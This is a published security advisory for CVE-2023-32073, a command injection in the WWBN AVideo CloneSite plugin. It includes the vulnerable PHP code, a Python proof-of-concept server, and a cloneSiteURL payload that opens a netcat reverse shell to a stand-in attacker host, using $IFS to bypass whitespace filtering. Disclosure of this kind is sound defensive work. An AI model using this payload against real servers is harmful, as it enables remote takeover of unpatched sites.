GHSA-2MHH-27V7-3VCX

Vulnerability from github – Published: 2023-05-12 20:20 – Updated: 2023-05-12 20:20
VLAI?
Summary
WWBN AVideo command injection vulnerability
Details

WWBN AVideo Authenticated RCE

A command injection vulnerability exists at plugin/CloneSite/cloneClient.json.php which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854 which affects WWBN Avideo up to version 12.3

Vulnerable Code

/plugin/CloneSite/cloneClient.json.php

$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile));
$json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles));
$json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles));

// get dump file
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

The $objClone->cloneSiteURL is not properly sanitized.

Exploit Proof-of-Concept

avidexploit.py

from http.server import BaseHTTPRequestHandler, HTTPServer
import time

hostName = "localhost"
serverPort = 8080

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        self.end_headers()
        self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8"))

if __name__ == "__main__":        
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")

Run in command line

$ python3 avidexploit.py &
$ ngrok tcp 8080 # optional if not running in VPS
  • Then get your public facing IP and Port. Enter a cloneSiteURL like the following then hit clone to achieve command injection
http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#

It is important to not use white spaces for the exploit to work. Replace whitespace with $IFS when adding arguments to your RCE

poc

Credits

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "12.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-32073"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-05-12T20:20:39Z",
    "nvd_published_at": "2023-05-12T14:15:10Z",
    "severity": "HIGH"
  },
  "details": "# WWBN AVideo Authenticated RCE \n\nA command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for [CVE-2023-30854](https://cve.report/CVE-2023-30854) which affects WWBN Avideo up to version 12.3\n\n## Vulnerable Code\n\n/plugin/CloneSite/cloneClient.json.php\n\n```php\n$json-\u003esqlFile = escapeshellarg(preg_replace(\u0027/[^a-z0-9_.-]/i\u0027, \u0027\u0027, $json-\u003esqlFile));\n$json-\u003evideoFiles = escapeshellarg(preg_replace(\u0027/[^a-z0-9_.-]/i\u0027, \u0027\u0027, $json-\u003evideoFiles));\n$json-\u003ephotoFiles = escapeshellarg(preg_replace(\u0027/[^a-z0-9_.-]/i\u0027, \u0027\u0027, $json-\u003ephotoFiles));\n\n// get dump file\n$cmd = \"wget -O {$clonesDir}{$json-\u003esqlFile} {$objClone-\u003ecloneSiteURL}videos/cache/clones/{$json-\u003esqlFile}\";\n$log-\u003eadd(\"Clone (2 of {$totalSteps}): Geting MySQL Dump file\");\nexec($cmd . \" 2\u003e\u00261\", $output, $return_val);\n```\n\nThe `$objClone-\u003ecloneSiteURL` is not properly sanitized.\n## Exploit Proof-of-Concept\n\navidexploit.py\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport time\n\nhostName = \"localhost\"\nserverPort = 8080\n\nclass MyServer(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"application/json\")\n        self.end_headers()\n        self.wfile.write(bytes(\"{\\\"error\\\":false,\\\"msg\\\":\\\"\\\",\\\"url\\\":\\\"https:\\/\\/attacker.com/\\/\\\",\\\"key\\\":\\\"2d6db3c09e41a9c27dbc72aecc4a6fc0\\\",\\\"useRsync\\\":1,\\\"videosDir\\\":\\\"\\/var\\/www\\/html\\/demo.avideo.com\\/videos\\/\\\",\\\"sqlFile\\\":\\\"Clone_mysqlDump_644ab263e62d6.sql\\\",\\\"videoFiles\\\":[],\\\"photoFiles\\\":[]}\", \"utf-8\"))\n\nif __name__ == \"__main__\":        \n    webServer = HTTPServer((hostName, serverPort), MyServer)\n    print(\"Server started http://%s:%s\" % (hostName, serverPort))\n\n    try:\n        webServer.serve_forever()\n    except KeyboardInterrupt:\n        pass\n\n    webServer.server_close()\n    print(\"Server stopped.\")\n```\n\nRun in command line\n```bash\n$ python3 avidexploit.py \u0026\n$ ngrok tcp 8080 # optional if not running in VPS\n```\n- Then get your public facing IP and Port. Enter a cloneSiteURL like the following then hit clone to achieve command injection\n```bash\nhttp://2.tcp.ngrok.io:14599/;nc$IFS\u0027ATTACKER.COM\u0027$IFS\u00275555\u0027$IFS-e$IFS/bin/sh;#\n```\n\n**It is important to not use white spaces for the exploit to work. Replace whitespace with `$IFS` when adding arguments to your RCE**\n\n\n![poc](https://i.ibb.co/bdpQYcK/2023-05-07-17-04-43-online-video-cutter-com.gif)\n\n## Credits\n\n- JM Sanchez\n- [https://www.linkedin.com/in/juanmarcosanchez/](https://www.linkedin.com/in/juanmarcosanchez/)",
  "id": "GHSA-2mhh-27v7-3vcx",
  "modified": "2023-05-12T20:20:39Z",
  "published": "2023-05-12T20:20:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2mhh-27v7-3vcx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32073"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WWBN AVideo command injection vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.